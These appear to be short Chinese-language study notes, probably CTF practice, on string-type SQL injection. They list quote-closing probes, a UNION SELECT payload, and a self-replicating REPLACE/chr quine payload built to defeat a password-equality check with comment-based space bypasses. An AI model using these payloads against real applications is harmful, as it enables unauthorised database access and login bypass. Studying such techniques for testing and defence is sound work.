字符型注入

字符型注入

单引号测试,闭合语句

id=1'

id='")

报错,查询字段

id=1' and 1=2 union select 1,2,3%23

其他和整型注入一样,不多做解释

$rows[0]==$password

1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",chr(34),chr(39)),chr(46),".")#',chr(34),chr(39)),chr(46),'1"/**/union/**/select/**/replace(replace(".",chr(34),chr(39)),chr(46),".")#')#

0x char chr等价